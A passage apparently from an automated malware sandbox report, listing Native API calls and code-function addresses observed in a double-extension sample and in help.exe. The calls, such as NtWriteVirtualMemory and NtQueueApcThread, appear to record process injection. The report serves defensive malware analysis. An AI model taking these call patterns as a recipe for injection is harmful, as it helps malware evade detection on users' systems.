                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882F90 NtProtectVirtualMemory,5_2_01882F90
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882FA0 NtQuerySection,5_2_01882FA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882FB0 NtResumeThread,5_2_01882FB0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882FE0 NtCreateFile,5_2_01882FE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882F30 NtCreateSection,5_2_01882F30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882F60 NtCreateProcessEx,5_2_01882F60
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882E80 NtReadVirtualMemory,5_2_01882E80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882EA0 NtAdjustPrivilegesToken,5_2_01882EA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882EE0 NtQueueApcThread,5_2_01882EE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01882E30 NtWriteVirtualMemory,5_2_01882E30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01883090 NtSetValueKey,5_2_01883090
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01883010 NtOpenDirectoryObject,5_2_01883010
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018839B0 NtGetContextThread,5_2_018839B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01883D10 NtOpenProcessToken,5_2_01883D10
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01883D70 NtOpenThread,5_2_01883D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B4340 NtSetContextThread,LdrInitializeThunk,12_2_034B4340
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B4650 NtSuspendThread,LdrInitializeThunk,12_2_034B4650
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2B60 NtClose,LdrInitializeThunk,12_2_034B2B60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BE0 NtQueryValueKey,LdrInitializeThunk,12_2_034B2BE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_034B2BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2BA0 NtEnumerateValueKey,LdrInitializeThunk,12_2_034B2BA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AD0 NtReadFile,LdrInitializeThunk,12_2_034B2AD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AF0 NtWriteFile,LdrInitializeThunk,12_2_034B2AF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F30 NtCreateSection,LdrInitializeThunk,12_2_034B2F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FE0 NtCreateFile,LdrInitializeThunk,12_2_034B2FE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FB0 NtResumeThread,LdrInitializeThunk,12_2_034B2FB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2EE0 NtQueueApcThread,LdrInitializeThunk,12_2_034B2EE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2E80 NtReadVirtualMemory,LdrInitializeThunk,12_2_034B2E80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D10 NtMapViewOfSection,LdrInitializeThunk,12_2_034B2D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D30 NtUnmapViewOfSection,LdrInitializeThunk,12_2_034B2D30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DD0 NtDelayExecution,LdrInitializeThunk,12_2_034B2DD0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_034B2DF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C60 NtCreateKey,LdrInitializeThunk,12_2_034B2C60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_034B2C70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CA0 NtQueryInformationToken,LdrInitializeThunk,12_2_034B2CA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B35C0 NtCreateMutant,LdrInitializeThunk,12_2_034B35C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B39B0 NtGetContextThread,LdrInitializeThunk,12_2_034B39B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2B80 NtQueryInformationFile,12_2_034B2B80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2AB0 NtWaitForSingleObject,12_2_034B2AB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F60 NtCreateProcessEx,12_2_034B2F60
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2F90 NtProtectVirtualMemory,12_2_034B2F90
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2FA0 NtQuerySection,12_2_034B2FA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2E30 NtWriteVirtualMemory,12_2_034B2E30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2EA0 NtAdjustPrivilegesToken,12_2_034B2EA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2D00 NtSetInformationFile,12_2_034B2D00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2DB0 NtEnumerateKey,12_2_034B2DB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2C00 NtQueryInformationProcess,12_2_034B2C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CC0 NtQueryVirtualMemory,12_2_034B2CC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B2CF0 NtOpenProcess,12_2_034B2CF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3010 NtOpenDirectoryObject,12_2_034B3010
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3090 NtSetValueKey,12_2_034B3090
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3D70 NtOpenThread,12_2_034B3D70
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B3D10 NtOpenProcessToken,12_2_034B3D10
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69290 NtAllocateVirtualMemory,12_2_02B69290
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69090 NtDeleteFile,12_2_02B69090
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B69130 NtClose,12_2_02B69130
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B68E40 NtCreateFile,12_2_02B68E40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B68FA0 NtReadFile,12_2_02B68FA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_013B3E340_2_013B3E34
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_013B6F900_2_013B6F90
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_013BDA9C0_2_013BDA9C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072107780_2_07210778
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072109200_2_07210920
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072867C00_2_072867C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072867D00_2_072867D0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_0728D3400_2_0728D340
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072863980_2_07286398
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072870300_2_07287030
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072870400_2_07287040
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_07286C080_2_07286C08
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_0728CCA00_2_0728CCA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 0_2_072888580_2_07288858
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004187235_2_00418723
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004028F05_2_004028F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040E1095_2_0040E109
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040E1135_2_0040E113
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004169235_2_00416923
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004101335_2_00410133
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040E2585_2_0040E258
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040E2635_2_0040E263
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004032705_2_00403270
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004012305_2_00401230
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040E2AC5_2_0040E2AC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0042EC135_2_0042EC13
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004025305_2_00402530
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004045A75_2_004045A7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_004046245_2_00404624
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040FF0A5_2_0040FF0A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0040FF135_2_0040FF13
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019101AA5_2_019101AA
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019081CC5_2_019081CC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018401005_2_01840100
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018EA1185_2_018EA118
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D81585_2_018D8158
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E20005_2_018E2000
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185E3F05_2_0185E3F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019103E65_2_019103E6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190A3525_2_0190A352
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018D02C05_2_018D02C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F02745_2_018F0274
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019105915_2_01910591
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018505355_2_01850535
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FE4F65_2_018FE4F6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F44205_2_018F4420
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019024465_2_01902446
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184C7C05_2_0184C7C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018747505_2_01874750
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018507705_2_01850770
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186C6E05_2_0186C6E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0191A9A65_2_0191A9A6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018669625_2_01866962
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018368B85_2_018368B8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0187E8F05_2_0187E8F0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185A8405_2_0185A840
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01906BD75_2_01906BD7
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190AB405_2_0190AB40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184EA805_2_0184EA80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01868DBF5_2_01868DBF
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0184ADE05_2_0184ADE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185AD005_2_0185AD00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018ECD1F5_2_018ECD1F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F0CB55_2_018F0CB5
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01840CF25_2_01840CF2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850C005_2_01850C00
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018CEFA05_2_018CEFA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01842FC85_2_01842FC8
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185CFE05_2_0185CFE0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01892F285_2_01892F28
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01870F305_2_01870F30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F2F305_2_018F2F30
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C4F405_2_018C4F40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190CE935_2_0190CE93
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01862E905_2_01862E90
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190EEDB5_2_0190EEDB
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190EE265_2_0190EE26
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01850E595_2_01850E59
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0185B1B05_2_0185B1B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188516C5_2_0188516C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183F1725_2_0183F172
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0191B16B5_2_0191B16B
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FF0CC5_2_018FF0CC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190F0E05_2_0190F0E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019070E95_2_019070E9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0189739A5_2_0189739A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190132D5_2_0190132D
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0183D34C5_2_0183D34C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018552A05_2_018552A0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186B2C05_2_0186B2C0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F12ED5_2_018F12ED
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018ED5B05_2_018ED5B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019075715_2_01907571
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190F43F5_2_0190F43F
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018414605_2_01841460
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190F7B05_2_0190F7B0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_019016CC5_2_019016CC
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018E59105_2_018E5910
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018599505_2_01859950
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186B9505_2_0186B950
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018538E05_2_018538E0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018BD8005_2_018BD800
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186FB805_2_0186FB80
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0188DBF95_2_0188DBF9
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C5BF05_2_018C5BF0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190FB765_2_0190FB76
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01895AA05_2_01895AA0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018F1AA35_2_018F1AA3
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018FDAC65_2_018FDAC6
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01907A465_2_01907A46
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190FA495_2_0190FA49
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C3A6C5_2_018C3A6C
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0186FDC05_2_0186FDC0
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01853D405_2_01853D40
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01901D5A5_2_01901D5A
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01907D735_2_01907D73
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190FCF25_2_0190FCF2
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_018C9C325_2_018C9C32
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01851F925_2_01851F92
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190FFB15_2_0190FFB1
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_0190FF095_2_0190FF09
                Source: C:\Users\user\Desktop\Zjf9D3oDifslon7.bat.exeCode function: 5_2_01859EB05_2_01859EB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353A35212_2_0353A352
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035403E612_2_035403E6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348E3F012_2_0348E3F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0352027412_2_03520274
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035002C012_2_035002C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0350815812_2_03508158
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0347010012_2_03470100
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0351A11812_2_0351A118
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035381CC12_2_035381CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035401AA12_2_035401AA
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0351200012_2_03512000
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034A475012_2_034A4750
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348077012_2_03480770
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0347C7C012_2_0347C7C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349C6E012_2_0349C6E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348053512_2_03480535
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0354059112_2_03540591
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353244612_2_03532446
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0352E4F612_2_0352E4F6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353AB4012_2_0353AB40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03536BD712_2_03536BD7
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0347EA8012_2_0347EA80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349696212_2_03496962
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0354A9A612_2_0354A9A6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348A84012_2_0348A840
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034AE8F012_2_034AE8F0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034668B812_2_034668B8
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034F4F4012_2_034F4F40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034C2F2812_2_034C2F28
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034A0F3012_2_034A0F30
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03472FC812_2_03472FC8
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348CFE012_2_0348CFE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034FEFA012_2_034FEFA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03480E5912_2_03480E59
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353EE2612_2_0353EE26
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353EEDB12_2_0353EEDB
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353CE9312_2_0353CE93
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03492E9012_2_03492E90
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348AD0012_2_0348AD00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0347ADE012_2_0347ADE0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03498DBF12_2_03498DBF
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03480C0012_2_03480C00
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03470CF212_2_03470CF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03520CB512_2_03520CB5
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0346D34C12_2_0346D34C
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353132D12_2_0353132D
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034C739A12_2_034C739A
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349B2C012_2_0349B2C0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035212ED12_2_035212ED
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034852A012_2_034852A0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034B516C12_2_034B516C
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0346F17212_2_0346F172
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0354B16B12_2_0354B16B
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348B1B012_2_0348B1B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0352F0CC12_2_0352F0CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353F0E012_2_0353F0E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035370E912_2_035370E9
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353F7B012_2_0353F7B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_035316CC12_2_035316CC
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353757112_2_03537571
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0351D5B012_2_0351D5B0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0347146012_2_03471460
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353F43F12_2_0353F43F
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353FB7612_2_0353FB76
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034BDBF912_2_034BDBF9
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034F5BF012_2_034F5BF0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349FB8012_2_0349FB80
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03537A4612_2_03537A46
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353FA4912_2_0353FA49
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034F3A6C12_2_034F3A6C
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0352DAC612_2_0352DAC6
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034C5AA012_2_034C5AA0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0348995012_2_03489950
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349B95012_2_0349B950
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034ED80012_2_034ED800
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034838E012_2_034838E0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353FF0912_2_0353FF09
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03481F9212_2_03481F92
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353FFB112_2_0353FFB1
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03489EB012_2_03489EB0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03483D4012_2_03483D40
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03531D5A12_2_03531D5A
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_03537D7312_2_03537D73
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0349FDC012_2_0349FDC0
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_034F9C3212_2_034F9C32
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_0353FCF212_2_0353FCF2
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B51B9012_2_02B51B90
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B5523012_2_02B55230
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B410B412_2_02B410B4
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B4113112_2_02B41131
                Source: C:\Windows\SysWOW64\help.exeCode function: 12_2_02B6B72012_2_02B6B720
